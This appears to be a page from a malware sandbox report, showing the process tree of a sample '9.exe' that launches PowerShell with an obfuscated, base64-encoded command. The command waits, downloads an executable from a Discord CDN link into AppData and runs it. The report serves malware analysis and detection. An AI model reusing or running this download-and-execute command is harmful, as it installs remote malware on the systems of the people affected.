popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • 9.exe "C:\Users\test22\AppData\Local\Temp\9.exe"

    840

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AZwB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAOAA0ADkAMQAwADEAOQA3ADcAMQA5ADQANAA5ADcAMwAzAC8AMQAwADgANAA5ADEAMAA1ADYAOAAxADQANwA3ADkAMQA5ADkAMwAvAGEAcwBjAHIAeQBwAHQALgBlAHgAZQAnACwAIAA8ACMAcwBsAHUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB1AGoAdAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB6AGUAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA5AC4AZQB4AGUAJwApACkAPAAjAGsAbABpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAaQBkACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB4AGYAegAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA5AC4AZQB4AGUAJwApADwAIwBqAG0AeQAjAD4A"

      2148

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf